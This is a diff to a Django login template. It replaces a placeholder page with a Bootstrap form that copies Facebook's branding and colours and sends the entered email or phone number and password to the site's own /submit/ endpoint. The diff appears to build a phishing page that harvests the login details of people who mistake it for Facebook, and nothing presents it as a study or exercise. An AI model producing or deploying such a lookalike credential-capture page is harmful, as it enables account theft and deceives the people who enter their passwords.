--- a/templates/login.html
+++ b/templates/login.html
@@ -1,22 +1,85 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Welcome to facebook</title>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+<title>Bootstrap Facebook Theme Login Form</title>
+<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
+<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
+<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
+<!-- <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"></script> -->
+<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"></script>
+<style>
+body {
+    color: #646464;
+    background: #e2e2e2;
+}	
+.login-form {
+    width: 300px;
+    margin: 30px auto;
+}
+.login-form h2 {
+    font-size: 26px;
+    font-weight: bold;
+    margin: 30px 0;
+    text-align: center;
+}
+.login-form form {
+    color: #fff;
+    background: #405e9e;
+    background: radial-gradient(circle, #4d6ba9, #375595);
+    box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
+    padding: 25px;
+    margin-bottom: 15px;
+}
+.login-form .form-control {
+    border-color: #dfdfdf;
+    box-shadow: none !important;
+}
+.login-form .form-control, .login-form .btn {
+    min-height: 38px;        
+}
+.login-form input[type="email"] {
+    border-radius: 2px 2px 0 0;
+}
+.login-form input[type="password"] {
+    border-radius: 0 0 2px 2px;
+    margin-top: -1px;
+}    
+.login-form .btn, .login-form .btn:active {        
+    font-size: 15px;
+    font-weight: bold;
+    border-radius: 2px;
+    background: #eeeeee !important;
+    color: #646464;
+    margin-bottom: 25px;
+}
+.login-form .btn:hover, .login-form .btn:focus{
+    background: #e4e4e4 !important;
+}
+.login-form a {		
+    color: #405e9e;
+}
+.login-form form a {
+    color: #fff;
+}
+</style>
 </head>
 <body>
-
-
-
-    <!-- The core Firebase JS SDK is always required and must be listed first -->
-    <script src="/__/firebase/7.24.0/firebase-app.js"></script>
-
-    <!-- TODO: Add SDKs for Firebase products that you want to use
-        https://firebase.google.com/docs/web/setup#available-libraries -->
-
-    <!-- Initialize Firebase -->
-    <script src="/__/firebase/init.js"></script>
-    
+<div class="login-form">
+    <form action="/submit/" method="post">
+        {% csrf_token %}
+		<h2 class="text-center">Facebook</h2>	
+        <div class="form-group">
+            <input type="text" class="form-control" placeholder="Email or Mobile" required="required" name="username">
+            <input type="password" class="form-control" placeholder="Password" required="required" name="password">
+        </div>
+        <div class="form-group">
+            <button type="submit" class="btn btn-secondary btn-block">Login</button>
+        </div>
+        <p class="text-center"><a href="#">Forgot Password?</a></p>     
+    </form>
+    <p class="text-center small">Not Registered? <a href="#">Create an Account</a></p>
+</div>
 </body>
 </html>
